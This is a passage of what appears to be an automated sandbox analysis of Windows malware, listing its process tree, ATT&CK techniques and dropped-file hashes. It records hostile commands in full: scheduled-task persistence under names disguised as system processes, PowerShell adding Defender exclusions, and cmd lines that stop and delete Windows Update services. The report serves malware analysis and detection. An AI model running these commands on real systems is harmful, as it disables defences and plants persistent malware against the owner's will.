    powershell <#fvdhjwqj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Realtek" } Else { "C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe" }
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /run /tn Realtek
      4⤵
      PID:3052
- C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe
  "C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 188
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\Windows\system\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\system\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Windows\system\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Videos\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Saved Games\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Saved Games\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Users\Default\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Users\Default\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\Logs\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\LocalService\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\LocalService\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\ServiceProfiles\LocalService\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost_8c" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\conhost_8.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost_8" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\conhost_8.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost_8c" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\conhost_8.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Recovery\a8e30002-b1b4-11ed-a8b7-cee1c2fbb193\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276

C:\Windows\system32\taskeng.exe
taskeng.exe {8D862EB2-A2DC-487F-BB89-C997FB79FF7D} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:3064
- C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe
  "C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1116
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2332
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1436
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1740
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:2460
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:1300
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:2452
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:2464
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:2296
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      PID:2104
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:2184
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:2152
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2392
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:980
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1620
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1396
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#svswkfzf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Realtek' /tr '''C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Realtek' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Realtek" /t REG_SZ /f /d 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe' }
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Realtek /tr "'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe'"
      4⤵
      Creates scheduled task(s)
      PID:2120
- - C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe lloebzutcnm
    3⤵
    PID:2840
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      Drops file in Program Files directory
      PID:2688
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    PID:2848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Name, VideoProcessor
      4⤵
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:480

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\sppsvc.exe

Filesize
1.6MB

MD5
0ea53df77445bfbde349bd4eed09dae1

SHA1
b4df1111097fbfb9a9ea3ad86ac130716fea12d0

SHA256
83f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335

SHA512
4396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\sppsvc.exe

Filesize
1.6MB

MD5
0ea53df77445bfbde349bd4eed09dae1

SHA1
b4df1111097fbfb9a9ea3ad86ac130716fea12d0

SHA256
83f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335

SHA512
4396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe

Filesize
2.0MB

MD5
158fc80385e03bc9190be1d44493b585

SHA1
90c82c58432711d773e70b351c7943c7354b9930

SHA256
30ba733a5d5626ed0787a7fef982b8f426dfe2c70c42c9086fb581d20406bef8

SHA512
12c9eccee01f9322cb6a063f5a7bd8f4755f641bf37c72864c0d9602a750bc69a29cc7192d7cf7573790461aa3356d4924c79bacb3c6f8099f448891533976b5

Download Submit
C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe

Filesize
2.0MB

MD5
158fc80385e03bc9190be1d44493b585

SHA1
90c82c58432711d773e70b351c7943c7354b9930

SHA256
30ba733a5d5626ed0787a7fef982b8f426dfe2c70c42c9086fb581d20406bef8

SHA512
12c9eccee01f9322cb6a063f5a7bd8f4755f641bf37c72864c0d9602a750bc69a29cc7192d7cf7573790461aa3356d4924c79bacb3c6f8099f448891533976b5

Download Submit
C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe

Filesize
2.0MB

MD5
158fc80385e03bc9190be1d44493b585

SHA1
90c82c58432711d773e70b351c7943c7354b9930

SHA256
30ba733a5d5626ed0787a7fef982b8f426dfe2c70c42c9086fb581d20406bef8

SHA512
12c9eccee01f9322cb6a063f5a7bd8f4755f641bf37c72864c0d9602a750bc69a29cc7192d7cf7573790461aa3356d4924c79bacb3c6f8099f448891533976b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\GWoDDBK4PE.bat

Filesize
238B

MD5
b1b2daaa00c034f9515e2c1b45651366

SHA1
ec110e32c971166f913e2fdcbd0c2d0538d00f44

SHA256
26ff7a0474327df102ab4f6973435c9dcc7f20fa8001ddd3d8771d0b707b4a96

SHA512
ad26893e7b3d136b02edc1212a8d1cc18ab7e1d3301e871712c149a7b5f344ce60c66bdb81f7f49b3a61f92ca71f44e62639c61e2006f349a10676aa28d3df68

Download Submit
C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe

Filesize
2.1MB

MD5
3ee631ed0386c88faaad83c97ade2dcd

SHA1
308ac9da54565404430b220881c76f49793c0e9f

SHA256
be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6

SHA512
976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe

Filesize
2.1MB

MD5
3ee631ed0386c88faaad83c97ade2dcd

SHA1
308ac9da54565404430b220881c76f49793c0e9f

SHA256
be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6

SHA512
976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
eb49b3de41220eb1766427f0f70034f6

SHA1
a9f8719e0f30c7b3e20b699cdc89f1788b240bbf

SHA256
a4016473ef13301e1eb73605bd96437d7976b7b083d17aa848f15049e10db9cf

SHA512
a312f0b9074276b1bfe75393f2d3a297a9f0487452a8df6c9dfc05c00dd666805e1cb59eaf465381d905736e0f0b8a114eaf71c9a42c2061258babd07ff9c920

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
eb49b3de41220eb1766427f0f70034f6

SHA1
a9f8719e0f30c7b3e20b699cdc89f1788b240bbf

SHA256
a4016473ef13301e1eb73605bd96437d7976b7b083d17aa848f15049e10db9cf

SHA512
a312f0b9074276b1bfe75393f2d3a297a9f0487452a8df6c9dfc05c00dd666805e1cb59eaf465381d905736e0f0b8a114eaf71c9a42c2061258babd07ff9c920

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
eb49b3de41220eb1766427f0f70034f6

SHA1
a9f8719e0f30c7b3e20b699cdc89f1788b240bbf

SHA256
a4016473ef13301e1eb73605bd96437d7976b7b083d17aa848f15049e10db9cf

SHA512
a312f0b9074276b1bfe75393f2d3a297a9f0487452a8df6c9dfc05c00dd666805e1cb59eaf465381d905736e0f0b8a114eaf71c9a42c2061258babd07ff9c920

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OHI8EB7WWPBNICYABYYX.temp

Filesize
7KB

MD5
eb49b3de41220eb1766427f0f70034f6

SHA1
a9f8719e0f30c7b3e20b699cdc89f1788b240bbf

SHA256
a4016473ef13301e1eb73605bd96437d7976b7b083d17aa848f15049e10db9cf

SHA512
a312f0b9074276b1bfe75393f2d3a297a9f0487452a8df6c9dfc05c00dd666805e1cb59eaf465381d905736e0f0b8a114eaf71c9a42c2061258babd07ff9c920

Download Submit
C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe

Filesize
1.6MB

MD5
0ea53df77445bfbde349bd4eed09dae1

SHA1
b4df1111097fbfb9a9ea3ad86ac130716fea12d0

SHA256
83f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335

SHA512
4396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357

Download Submit
C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe

Filesize
1.6MB

MD5
0ea53df77445bfbde349bd4eed09dae1

SHA1
b4df1111097fbfb9a9ea3ad86ac130716fea12d0

SHA256
83f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335

SHA512
4396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357

Download Submit
C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe

Filesize
1.6MB

MD5
0ea53df77445bfbde349bd4eed09dae1

SHA1
b4df1111097fbfb9a9ea3ad86ac130716fea12d0

SHA256
83f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335

SHA512
4396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357

Download Submit
C:\Users\Admin\AppData\Roaming\conhost_8.exe

Filesize
2.0MB

MD5
b521b2a220a99d820b688d4ad5db8067

SHA1
08e97a2e4871b789d3388fd51479710626b69a92

SHA256
55371f430ea0369bf4e079f39558a4c6c5462b19ddc9f16f064286288f50a12b

SHA512
2e4d9b8d556a609abae4dfedf18136618fb1bb8f77d3a596c97bffc2edde9dec147456dcf586c00de9a438b789599fe288de8117109b6b04db9045279b3caca1

Download Submit
C:\Users\Admin\AppData\Roaming\conhost_8.exe

Filesize
2.0MB

MD5
b521b2a220a99d820b688d4ad5db8067

SHA1
08e97a2e4871b789d3388fd51479710626b69a92

SHA256
55371f430ea0369bf4e079f39558a4c6c5462b19ddc9f16f064286288f50a12b

SHA512
2e4d9b8d556a609abae4dfedf18136618fb1bb8f77d3a596c97bffc2edde9dec147456dcf586c00de9a438b789599fe288de8117109b6b04db9045279b3caca1

Download Submit
\Program Files\Realtek\Realtek High Definition Audio\Updater.exe

Filesize
2.0MB

MD5
158fc80385e03bc9190be1d44493b585

SHA1
90c82c58432711d773e70b351c7943c7354b9930

SHA256
30ba733a5d5626ed0787a7fef982b8f426dfe2c70c42c9086fb581d20406bef8

SHA512
12c9eccee01f9322cb6a063f5a7bd8f4755f641bf37c72864c0d9602a750bc69a29cc7192d7cf7573790461aa3356d4924c79bacb3c6f8099f448891533976b5

Download Submit
\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe

Filesize
2.1MB

MD5
3ee631ed0386c88faaad83c97ade2dcd

SHA1
308ac9da54565404430b220881c76f49793c0e9f

SHA256
be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6

SHA512
